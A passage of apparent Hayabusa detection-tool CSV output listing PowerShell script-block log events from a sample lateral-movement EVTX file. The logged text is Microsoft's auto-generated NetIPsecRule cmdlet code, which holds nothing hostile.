= 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( 
[Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 
